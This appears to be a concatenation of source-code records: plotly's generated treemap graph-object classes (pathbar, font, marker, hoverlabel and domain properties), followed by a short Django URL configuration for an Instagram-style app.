        Construct a new Pathbar object.
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Pathbar
        edgeshape
            Shape used for edges between labels.
        side
            Side of the treemap where the pathbar is presented.
        textfont
            Font used inside the pathbar.
        thickness
            Thickness of the pathbar (in px).
        visible
            Whether the path bar is drawn.
        Returns
        -------
        Pathbar
        """
        super(Pathbar, self).__init__("pathbar")
        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Pathbar
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Pathbar"""
            )
        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        # Import validators
        # -----------------
        from plotly.validators.treemap import pathbar as v_pathbar
        # Initialize validators
        # ---------------------
        self._validators["edgeshape"] = v_pathbar.EdgeshapeValidator()
        self._validators["side"] = v_pathbar.SideValidator()
        self._validators["textfont"] = v_pathbar.TextfontValidator()
        self._validators["thickness"] = v_pathbar.ThicknessValidator()
        self._validators["visible"] = v_pathbar.VisibleValidator()
        # Populate data dict with properties
        # ----------------------------------
        # Explicit keyword arguments take precedence over entries in `arg`.
        _v = arg.pop("edgeshape", None)
        self["edgeshape"] = edgeshape if edgeshape is not None else _v
        _v = arg.pop("side", None)
        self["side"] = side if side is not None else _v
        _v = arg.pop("textfont", None)
        self["textfont"] = textfont if textfont is not None else _v
        _v = arg.pop("thickness", None)
        self["thickness"] = thickness if thickness is not None else _v
        _v = arg.pop("visible", None)
        self["visible"] = visible if visible is not None else _v
        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))
        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Outsidetextfont(_BaseTraceHierarchyType):
    """Font settings for text drawn outside treemap sectors (color,
    family, size, plus their plot.ly source references)."""
    # color
    # -----
    @property
    def color(self):
        """Text color (or array of colors via `colorsrc`)."""
        return self["color"]
    @color.setter
    def color(self, val):
        self["color"] = val
    # colorsrc
    # --------
    @property
    def colorsrc(self):
        """Source reference on plot.ly for color."""
        return self["colorsrc"]
    @colorsrc.setter
    def colorsrc(self, val):
        self["colorsrc"] = val
    # family
    # ------
    @property
    def family(self):
        """HTML font family applied by the web browser."""
        return self["family"]
    @family.setter
    def family(self, val):
        self["family"] = val
    # familysrc
    # ---------
    @property
    def familysrc(self):
        """Source reference on plot.ly for family."""
        return self["familysrc"]
    @familysrc.setter
    def familysrc(self, val):
        self["familysrc"] = val
    # size
    # ----
    @property
    def size(self):
        """Font size."""
        return self["size"]
    @size.setter
    def size(self, val):
        self["size"] = val
    # sizesrc
    # -------
    @property
    def sizesrc(self):
        """Source reference on plot.ly for size."""
        return self["sizesrc"]
    @sizesrc.setter
    def sizesrc(self, val):
        self["sizesrc"] = val
    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"
    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        # NOTE(review): the stray ",," after "Droid Sans" is a typo in the
        # upstream generated text; the fix belongs in the code generator.
        return """\
        color
        colorsrc
            Sets the source reference on plot.ly for color .
        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The
            plotly service (at https://plot.ly or on-premise)
            generates images on a server, where only a select
            number of fonts are installed and supported. These
            include "Arial", "Balto", "Courier New", "Droid Sans",,
            "Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
            Standard TT", "Open Sans", "Overpass", "PT Sans
            Narrow", "Raleway", "Times New Roman".
        familysrc
            Sets the source reference on plot.ly for family .
        size
        sizesrc
            Sets the source reference on plot.ly for size .
        """
    def __init__(
        self,
        arg=None,
        color=None,
        colorsrc=None,
        family=None,
        familysrc=None,
        size=None,
        sizesrc=None,
        **kwargs
    ):
        """
        Construct a new Outsidetextfont object.
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Outsidetextfont
        color
        colorsrc
            Source reference on plot.ly for color.
        family
            HTML font family.
        familysrc
            Source reference on plot.ly for family.
        size
        sizesrc
            Source reference on plot.ly for size.
        Returns
        -------
        Outsidetextfont
        """
        super(Outsidetextfont, self).__init__("outsidetextfont")
        # Normalize `arg` into a private dict copy.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Outsidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Outsidetextfont"""
            )
        # Honor the private skip_invalid flag before assignments happen.
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        from plotly.validators.treemap import outsidetextfont as v_outsidetextfont
        # Register one validator per property.
        self._validators["color"] = v_outsidetextfont.ColorValidator()
        self._validators["colorsrc"] = v_outsidetextfont.ColorsrcValidator()
        self._validators["family"] = v_outsidetextfont.FamilyValidator()
        self._validators["familysrc"] = v_outsidetextfont.FamilysrcValidator()
        self._validators["size"] = v_outsidetextfont.SizeValidator()
        self._validators["sizesrc"] = v_outsidetextfont.SizesrcValidator()
        # Explicit keyword arguments take precedence over entries in `arg`.
        _v = arg.pop("color", None)
        self["color"] = color if color is not None else _v
        _v = arg.pop("colorsrc", None)
        self["colorsrc"] = colorsrc if colorsrc is not None else _v
        _v = arg.pop("family", None)
        self["family"] = family if family is not None else _v
        _v = arg.pop("familysrc", None)
        self["familysrc"] = familysrc if familysrc is not None else _v
        _v = arg.pop("size", None)
        self["size"] = size if size is not None else _v
        _v = arg.pop("sizesrc", None)
        self["sizesrc"] = sizesrc if sizesrc is not None else _v
        self._process_kwargs(**dict(arg, **kwargs))
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Marker(_BaseTraceHierarchyType):
    """Marker (sector color/colorscale) options for a treemap trace."""
    @property
    def autocolorscale(self):
        """Whether the colorscale is a default palette or the one set in
        `marker.colorscale`."""
        return self["autocolorscale"]
    @autocolorscale.setter
    def autocolorscale(self, val):
        self["autocolorscale"] = val
    @property
    def cauto(self):
        """Whether the color domain is computed from the data or from
        `marker.cmin`/`marker.cmax`."""
        return self["cauto"]
    @cauto.setter
    def cauto(self, val):
        self["cauto"] = val
    @property
    def cmax(self):
        """Upper bound of the color domain."""
        return self["cmax"]
    @cmax.setter
    def cmax(self, val):
        self["cmax"] = val
    @property
    def cmid(self):
        """Mid-point of the color domain (scales `marker.cmin` and/or
        `marker.cmax` to be equidistant to it)."""
        return self["cmid"]
    @cmid.setter
    def cmid(self, val):
        self["cmid"] = val
    @property
    def cmin(self):
        """Lower bound of the color domain."""
        return self["cmin"]
    @cmin.setter
    def cmin(self, val):
        self["cmin"] = val
    @property
    def coloraxis(self):
        """Reference to a shared color axis ("coloraxis", "coloraxis2", ...)."""
        return self["coloraxis"]
    @coloraxis.setter
    def coloraxis(self, val):
        self["coloraxis"] = val
    @property
    def colorbar(self):
        """treemap.marker.ColorBar instance or dict with compatible
        properties."""
        return self["colorbar"]
    @colorbar.setter
    def colorbar(self, val):
        self["colorbar"] = val
    @property
    def colors(self):
        """Color of each sector of this trace."""
        return self["colors"]
    @colors.setter
    def colors(self, val):
        self["colors"] = val
    @property
    def colorscale(self):
        """The colorscale: an array mapping normalized values to colors,
        or a named palette."""
        return self["colorscale"]
    @colorscale.setter
    def colorscale(self, val):
        self["colorscale"] = val
    @property
    def colorssrc(self):
        """Source reference on plot.ly for colors."""
        return self["colorssrc"]
    @colorssrc.setter
    def colorssrc(self, val):
        self["colorssrc"] = val
    @property
    def depthfade(self):
        """Whether sector colors fade towards the background from the
        leaves up to the headers."""
        return self["depthfade"]
    @depthfade.setter
    def depthfade(self, val):
        self["depthfade"] = val
    @property
    def line(self):
        """treemap.marker.Line instance or dict with compatible
        properties."""
        return self["line"]
    @line.setter
    def line(self, val):
        self["line"] = val
    @property
    def pad(self):
        """treemap.marker.Pad instance or dict with compatible
        properties."""
        return self["pad"]
    @pad.setter
    def pad(self, val):
        self["pad"] = val
    @property
    def reversescale(self):
        """Reverses the color mapping if true."""
        return self["reversescale"]
    @reversescale.setter
    def reversescale(self, val):
        self["reversescale"] = val
    @property
    def showscale(self):
        """Whether a colorbar is displayed for this trace."""
        return self["showscale"]
    @showscale.setter
    def showscale(self, val):
        self["showscale"] = val
    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"
    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        return """\
        autocolorscale
            Determines whether the colorscale is a default palette
            (`autocolorscale: true`) or the palette determined by
            `marker.colorscale`. Has an effect only if colorsis set
            to a numerical array. In case `colorscale` is
            unspecified or `autocolorscale` is true, the default
            palette will be chosen according to whether numbers in
            the `color` array are all positive, all negative or
            mixed.
        cauto
            Determines whether or not the color domain is computed
            with respect to the input data (here colors) or the
            bounds set in `marker.cmin` and `marker.cmax` Has an
            effect only if colorsis set to a numerical array.
            Defaults to `false` when `marker.cmin` and
            `marker.cmax` are set by the user.
        cmax
            Sets the upper bound of the color domain. Has an effect
            only if colorsis set to a numerical array. Value should
            have the same units as colors and if set, `marker.cmin`
            must be set as well.
        cmid
            Sets the mid-point of the color domain by scaling
            `marker.cmin` and/or `marker.cmax` to be equidistant to
            this point. Has an effect only if colorsis set to a
            numerical array. Value should have the same units as
            colors. Has no effect when `marker.cauto` is `false`.
        cmin
            Sets the lower bound of the color domain. Has an effect
            only if colorsis set to a numerical array. Value should
            have the same units as colors and if set, `marker.cmax`
            must be set as well.
        coloraxis
            Sets a reference to a shared color axis. References to
            these shared color axes are "coloraxis", "coloraxis2",
            "coloraxis3", etc. Settings for these shared color axes
            are set in the layout, under `layout.coloraxis`,
            `layout.coloraxis2`, etc. Note that multiple color
            scales can be linked to the same color axis.
        colorbar
            plotly.graph_objects.treemap.marker.ColorBar instance
            or dict with compatible properties
        colors
            Sets the color of each sector of this trace. If not
            specified, the default trace color set is used to pick
            the sector colors.
        colorscale
            Sets the colorscale. Has an effect only if colorsis set
            to a numerical array. The colorscale must be an array
            containing arrays mapping a normalized value to an rgb,
            rgba, hex, hsl, hsv, or named color string. At minimum,
            a mapping for the lowest (0) and highest (1) values are
            required. For example, `[[0, 'rgb(0,0,255)'], [1,
            'rgb(255,0,0)']]`. To control the bounds of the
            colorscale in color space, use`marker.cmin` and
            `marker.cmax`. Alternatively, `colorscale` may be a
            palette name string of the following list: Greys,YlGnBu
            ,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
            ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
            s.
        colorssrc
            Sets the source reference on plot.ly for colors .
        depthfade
            Determines if the sector colors are faded towards the
            background from the leaves up to the headers. This
            option is unavailable when a `colorscale` is present,
            defaults to false when `marker.colors` is set, but
            otherwise defaults to true. When set to "reversed", the
            fading direction is inverted, that is the top elements
            within hierarchy are drawn with fully saturated colors
            while the leaves are faded towards the background
            color.
        line
            plotly.graph_objects.treemap.marker.Line instance or
            dict with compatible properties
        pad
            plotly.graph_objects.treemap.marker.Pad instance or
            dict with compatible properties
        reversescale
            Reverses the color mapping if true. Has an effect only
            if colorsis set to a numerical array. If true,
            `marker.cmin` will correspond to the last color in the
            array and `marker.cmax` will correspond to the first
            color.
        showscale
            Determines whether or not a colorbar is displayed for
            this trace. Has an effect only if colorsis set to a
            numerical array.
        """
    def __init__(
        self,
        arg=None,
        autocolorscale=None,
        cauto=None,
        cmax=None,
        cmid=None,
        cmin=None,
        coloraxis=None,
        colorbar=None,
        colors=None,
        colorscale=None,
        colorssrc=None,
        depthfade=None,
        line=None,
        pad=None,
        reversescale=None,
        showscale=None,
        **kwargs
    ):
        """
        Construct a new Marker object.
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Marker
        (remaining keyword arguments correspond one-to-one to the
        properties documented in `_prop_descriptions` above)
        Returns
        -------
        Marker
        """
        super(Marker, self).__init__("marker")
        # Normalize `arg` into a private dict copy.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Marker
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Marker"""
            )
        # Honor the private skip_invalid flag before assignments happen.
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        from plotly.validators.treemap import marker as v_marker
        # Register one validator per property.
        self._validators["autocolorscale"] = v_marker.AutocolorscaleValidator()
        self._validators["cauto"] = v_marker.CautoValidator()
        self._validators["cmax"] = v_marker.CmaxValidator()
        self._validators["cmid"] = v_marker.CmidValidator()
        self._validators["cmin"] = v_marker.CminValidator()
        self._validators["coloraxis"] = v_marker.ColoraxisValidator()
        self._validators["colorbar"] = v_marker.ColorBarValidator()
        self._validators["colors"] = v_marker.ColorsValidator()
        self._validators["colorscale"] = v_marker.ColorscaleValidator()
        self._validators["colorssrc"] = v_marker.ColorssrcValidator()
        self._validators["depthfade"] = v_marker.DepthfadeValidator()
        self._validators["line"] = v_marker.LineValidator()
        self._validators["pad"] = v_marker.PadValidator()
        self._validators["reversescale"] = v_marker.ReversescaleValidator()
        self._validators["showscale"] = v_marker.ShowscaleValidator()
        # Explicit keyword arguments take precedence over entries in `arg`.
        _v = arg.pop("autocolorscale", None)
        self["autocolorscale"] = autocolorscale if autocolorscale is not None else _v
        _v = arg.pop("cauto", None)
        self["cauto"] = cauto if cauto is not None else _v
        _v = arg.pop("cmax", None)
        self["cmax"] = cmax if cmax is not None else _v
        _v = arg.pop("cmid", None)
        self["cmid"] = cmid if cmid is not None else _v
        _v = arg.pop("cmin", None)
        self["cmin"] = cmin if cmin is not None else _v
        _v = arg.pop("coloraxis", None)
        self["coloraxis"] = coloraxis if coloraxis is not None else _v
        _v = arg.pop("colorbar", None)
        self["colorbar"] = colorbar if colorbar is not None else _v
        _v = arg.pop("colors", None)
        self["colors"] = colors if colors is not None else _v
        _v = arg.pop("colorscale", None)
        self["colorscale"] = colorscale if colorscale is not None else _v
        _v = arg.pop("colorssrc", None)
        self["colorssrc"] = colorssrc if colorssrc is not None else _v
        _v = arg.pop("depthfade", None)
        self["depthfade"] = depthfade if depthfade is not None else _v
        _v = arg.pop("line", None)
        self["line"] = line if line is not None else _v
        _v = arg.pop("pad", None)
        self["pad"] = pad if pad is not None else _v
        _v = arg.pop("reversescale", None)
        self["reversescale"] = reversescale if reversescale is not None else _v
        _v = arg.pop("showscale", None)
        self["showscale"] = showscale if showscale is not None else _v
        self._process_kwargs(**dict(arg, **kwargs))
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Insidetextfont(_BaseTraceHierarchyType):
    """Font settings for text drawn inside treemap sectors (color,
    family, size, plus their plot.ly source references)."""
    @property
    def color(self):
        """Text color (or array of colors via `colorsrc`)."""
        return self["color"]
    @color.setter
    def color(self, val):
        self["color"] = val
    @property
    def colorsrc(self):
        """Source reference on plot.ly for color."""
        return self["colorsrc"]
    @colorsrc.setter
    def colorsrc(self, val):
        self["colorsrc"] = val
    @property
    def family(self):
        """HTML font family applied by the web browser."""
        return self["family"]
    @family.setter
    def family(self, val):
        self["family"] = val
    @property
    def familysrc(self):
        """Source reference on plot.ly for family."""
        return self["familysrc"]
    @familysrc.setter
    def familysrc(self, val):
        self["familysrc"] = val
    @property
    def size(self):
        """Font size."""
        return self["size"]
    @size.setter
    def size(self, val):
        self["size"] = val
    @property
    def sizesrc(self):
        """Source reference on plot.ly for size."""
        return self["sizesrc"]
    @sizesrc.setter
    def sizesrc(self, val):
        self["sizesrc"] = val
    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"
    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        # NOTE(review): the stray ",," after "Droid Sans" is a typo in the
        # upstream generated text; the fix belongs in the code generator.
        return """\
        color
        colorsrc
            Sets the source reference on plot.ly for color .
        family
            HTML font family - the typeface that will be applied by
            the web browser. The web browser will only be able to
            apply a font if it is available on the system which it
            operates. Provide multiple font families, separated by
            commas, to indicate the preference in which to apply
            fonts if they aren't available on the system. The
            plotly service (at https://plot.ly or on-premise)
            generates images on a server, where only a select
            number of fonts are installed and supported. These
            include "Arial", "Balto", "Courier New", "Droid Sans",,
            "Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
            Standard TT", "Open Sans", "Overpass", "PT Sans
            Narrow", "Raleway", "Times New Roman".
        familysrc
            Sets the source reference on plot.ly for family .
        size
        sizesrc
            Sets the source reference on plot.ly for size .
        """
    def __init__(
        self,
        arg=None,
        color=None,
        colorsrc=None,
        family=None,
        familysrc=None,
        size=None,
        sizesrc=None,
        **kwargs
    ):
        """
        Construct a new Insidetextfont object.
        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.treemap.Insidetextfont
        color
        colorsrc
            Source reference on plot.ly for color.
        family
            HTML font family.
        familysrc
            Source reference on plot.ly for family.
        size
        sizesrc
            Source reference on plot.ly for size.
        Returns
        -------
        Insidetextfont
        """
        super(Insidetextfont, self).__init__("insidetextfont")
        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Insidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Insidetextfont"""
            )
        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        # Import validators
        # -----------------
        from plotly.validators.treemap import insidetextfont as v_insidetextfont
        # Initialize validators
        # ---------------------
        self._validators["color"] = v_insidetextfont.ColorValidator()
        self._validators["colorsrc"] = v_insidetextfont.ColorsrcValidator()
        self._validators["family"] = v_insidetextfont.FamilyValidator()
        self._validators["familysrc"] = v_insidetextfont.FamilysrcValidator()
        self._validators["size"] = v_insidetextfont.SizeValidator()
        self._validators["sizesrc"] = v_insidetextfont.SizesrcValidator()
        # Populate data dict with properties
        # ----------------------------------
        # Explicit keyword arguments take precedence over entries in `arg`.
        _v = arg.pop("color", None)
        self["color"] = color if color is not None else _v
        _v = arg.pop("colorsrc", None)
        self["colorsrc"] = colorsrc if colorsrc is not None else _v
        _v = arg.pop("family", None)
        self["family"] = family if family is not None else _v
        _v = arg.pop("familysrc", None)
        self["familysrc"] = familysrc if familysrc is not None else _v
        _v = arg.pop("size", None)
        self["size"] = size if size is not None else _v
        _v = arg.pop("sizesrc", None)
        self["sizesrc"] = sizesrc if sizesrc is not None else _v
        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))
        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
    # align
    # -----
    @property
    def align(self):
        """Horizontal alignment of text content within the hover label box."""
        return self["align"]
    @align.setter
    def align(self, val):
        self["align"] = val
    # alignsrc
    # --------
    @property
    def alignsrc(self):
        """Source reference on plot.ly for align."""
        return self["alignsrc"]
    @alignsrc.setter
    def alignsrc(self, val):
        self["alignsrc"] = val
    # bgcolor
    # -------
    @property
    def bgcolor(self):
        """Background color of the hover labels for this trace."""
        return self["bgcolor"]
    @bgcolor.setter
    def bgcolor(self, val):
        self["bgcolor"] = val
    # bgcolorsrc
    # ----------
    @property
    def bgcolorsrc(self):
        """Source reference on plot.ly for bgcolor."""
        return self["bgcolorsrc"]
    @bgcolorsrc.setter
    def bgcolorsrc(self, val):
        self["bgcolorsrc"] = val
    # bordercolor
    # -----------
    @property
    def bordercolor(self):
        """Border color of the hover labels for this trace."""
        return self["bordercolor"]
    @bordercolor.setter
    def bordercolor(self, val):
        self["bordercolor"] = val
    # bordercolorsrc
    # --------------
    @property
    def bordercolorsrc(self):
        """Source reference on plot.ly for bordercolor."""
        return self["bordercolorsrc"]
    @bordercolorsrc.setter
    def bordercolorsrc(self, val):
        self["bordercolorsrc"] = val
    # font
    # ----
    @property
    def font(self):
        """Font used in hover labels."""
        return self["font"]
    @font.setter
    def font(self, val):
        self["font"] = val
    # namelength
    # ----------
    @property
    def namelength(self):
        """Default length (in characters) of the trace name in hover
        labels; -1 shows the whole name."""
        return self["namelength"]
    @namelength.setter
    def namelength(self, val):
        self["namelength"] = val
    # namelengthsrc
    # -------------
    @property
    def namelengthsrc(self):
        """Source reference on plot.ly for namelength."""
        return self["namelengthsrc"]
    @namelengthsrc.setter
    def namelengthsrc(self, val):
        self["namelengthsrc"] = val
    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        """Return the parent path string, "treemap"."""
        return "treemap"
    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        """Return the plain-text description of this object's properties."""
        return """\
        align
            Sets the horizontal alignment of the text content
            within hover label box. Has an effect only if the hover
            label text spans more two or more lines
        alignsrc
            Sets the source reference on plot.ly for align .
        bgcolor
            Sets the background color of the hover labels for this
            trace
        bgcolorsrc
            Sets the source reference on plot.ly for bgcolor .
        bordercolor
            Sets the border color of the hover labels for this
            trace.
        bordercolorsrc
            Sets the source reference on plot.ly for bordercolor .
        font
            Sets the font used in hover labels.
        namelength
            Sets the default length (in number of characters) of
            the trace name in the hover labels for all traces. -1
            shows the whole name regardless of length. 0-3 shows
            the first 0-3 characters, and an integer >3 will show
            the whole name if it is less than that many characters,
            but if it is longer, will truncate to `namelength - 3`
            characters and add an ellipsis.
        namelengthsrc
            Sets the source reference on plot.ly for namelength .
        """
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
super(Hoverlabel, self).__init__("hoverlabel")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Hoverlabel"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import hoverlabel as v_hoverlabel
# Initialize validators
# ---------------------
self._validators["align"] = v_hoverlabel.AlignValidator()
self._validators["alignsrc"] = v_hoverlabel.AlignsrcValidator()
self._validators["bgcolor"] = v_hoverlabel.BgcolorValidator()
self._validators["bgcolorsrc"] = v_hoverlabel.BgcolorsrcValidator()
self._validators["bordercolor"] = v_hoverlabel.BordercolorValidator()
self._validators["bordercolorsrc"] = v_hoverlabel.BordercolorsrcValidator()
self._validators["font"] = v_hoverlabel.FontValidator()
self._validators["namelength"] = v_hoverlabel.NamelengthValidator()
self._validators["namelengthsrc"] = v_hoverlabel.NamelengthsrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("align", None)
self["align"] = align if align is not None else _v
_v = arg.pop("alignsrc", None)
self["alignsrc"] = alignsrc if alignsrc is not None else _v
_v = arg.pop("bgcolor", None)
self["bgcolor"] = bgcolor if bgcolor is not None else _v
_v = arg.pop("bgcolorsrc", None)
self["bgcolorsrc"] = bgcolorsrc if bgcolorsrc is not None else _v
_v = arg.pop("bordercolor", None)
self["bordercolor"] = bordercolor if bordercolor is not None else _v
_v = arg.pop("bordercolorsrc", None)
self["bordercolorsrc"] = bordercolorsrc if bordercolorsrc is not None else _v
_v = arg.pop("font", None)
self["font"] = font if font is not None else _v
_v = arg.pop("namelength", None)
self["namelength"] = namelength if namelength is not None else _v
_v = arg.pop("namelengthsrc", None)
self["namelengthsrc"] = namelengthsrc if namelengthsrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Domain(_BaseTraceHierarchyType):
    """Layout domain of the treemap trace within the figure.

    Generated plotly graph-object wrapper: every property delegates to
    ``self[...]`` item access, which routes through the validators
    registered in ``__init__`` (see ``plotly.validators.treemap.domain``).
    """
    # column
    # ------
    @property
    def column(self):
        """Grid column used for this trace's domain (when a layout grid exists)."""
        return self["column"]
    @column.setter
    def column(self, val):
        self["column"] = val
    # row
    # ---
    @property
    def row(self):
        """Grid row used for this trace's domain (when a layout grid exists)."""
        return self["row"]
    @row.setter
    def row(self, val):
        self["row"] = val
    # x
    # -
    @property
    def x(self):
        """Horizontal domain of this trace, in plot fraction."""
        return self["x"]
    @x.setter
    def x(self, val):
        self["x"] = val
    # y
    # -
    @property
    def y(self):
        """Vertical domain of this trace, in plot fraction."""
        return self["y"]
    @y.setter
    def y(self, val):
        self["y"] = val
    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        # Dotted path of the parent object in the figure hierarchy.
        return "treemap"
    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        return """\
        column
            If there is a layout grid, use the domain for this
            column in the grid for this treemap trace .
        row
            If there is a layout grid, use the domain for this row
            in the grid for this treemap trace .
        x
            Sets the horizontal domain of this treemap trace (in
            plot fraction).
        y
            Sets the vertical domain of this treemap trace (in plot
            fraction).
        """
    def __init__(self, arg=None, column=None, row=None, x=None, y=None, **kwargs):
        """Construct a new Domain.

        ``arg`` may be a dict or another Domain instance whose properties
        are copied; explicit keyword arguments override entries in ``arg``.
        """
        super(Domain, self).__init__("domain")
        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.treemap.Domain
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Domain"""
            )
        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        # Import validators
        # -----------------
        from plotly.validators.treemap import domain as v_domain
        # Initialize validators
        # ---------------------
        self._validators["column"] = v_domain.ColumnValidator()
        self._validators["row"] = v_domain.RowValidator()
        self._validators["x"] = v_domain.XValidator()
        self._validators["y"] = v_domain.YValidator()
        # Populate data dict with properties
        # ----------------------------------
        _v = arg.pop("column", None)
        self["column"] = column if column is not None else _v
        _v = arg.pop("row", None)
        self["row"] = row if row is not None else _v
        _v = arg.pop("x", None)
        self["x"] = x if x is not None else _v
        _v = arg.pop("y", None)
        self["y"] = y if y is not None else _v
        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))
        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
# Public API of the plotly.graph_objs.treemap package: graph-object
# classes plus the nested submodules re-exported below.
__all__ = [
    "Domain",
    "Hoverlabel",
    "Insidetextfont",
    "Marker",
    "Outsidetextfont",
    "Pathbar",
    "Stream",
    "Textfont",
    "Tiling",
    "hoverlabel",
    "marker",
    "pathbar",
]
from plotly.graph_objs.treemap import pathbar
from plotly.graph_objs.treemap import marker
from plotly.graph_objs.treemap import hoverlabel
| true
| true
|
f705372d8ae86131f8816526842556b71e7b9ae5
| 337
|
py
|
Python
|
insta/urls.py
|
osman2491/Insta
|
f941f2b20f814e1c13fe0f9c02a1a60be3cd2c87
|
[
"MIT"
] | null | null | null |
insta/urls.py
|
osman2491/Insta
|
f941f2b20f814e1c13fe0f9c02a1a60be3cd2c87
|
[
"MIT"
] | 2
|
2021-06-10T22:33:39.000Z
|
2021-09-08T01:39:21.000Z
|
insta/urls.py
|
osman2491/Insta
|
f941f2b20f814e1c13fe0f9c02a1a60be3cd2c87
|
[
"MIT"
] | null | null | null |
# Project-level URL configuration (legacy Django <2.0 `url()` style).
from django.conf.urls import url,include
from django.contrib import admin
from django.contrib.auth import views
urlpatterns = [
    # Django admin site.
    url(r'^admin/', admin.site.urls),
    # Everything else is delegated to the instagram app's urlconf.
    url(r'',include('instagram.urls')),
    # django-registration (simple backend) signup/login flows.
    url(r'^accounts/', include('registration.backends.simple.urls')),
    # Log out and redirect to the site root.
    # NOTE(review): the function-based `views.logout` was removed in Django 2.1;
    # on modern Django this must become
    # `LogoutView.as_view(next_page='/')` — confirm the pinned Django version
    # before changing it.
    url(r'^logout/$', views.logout, {"next_page": '/'}),
]
| 33.7
| 69
| 0.682493
|
from django.conf.urls import url,include
from django.contrib import admin
from django.contrib.auth import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'',include('instagram.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'}),
]
| true
| true
|
f705378db8f82576f4e65044784728515b32f0c3
| 10,546
|
py
|
Python
|
vfm.py
|
jilljenn/vfm
|
4cb2f5157ee7301321bb4babedb62223a720d231
|
[
"MIT"
] | null | null | null |
vfm.py
|
jilljenn/vfm
|
4cb2f5157ee7301321bb4babedb62223a720d231
|
[
"MIT"
] | null | null | null |
vfm.py
|
jilljenn/vfm
|
4cb2f5157ee7301321bb4babedb62223a720d231
|
[
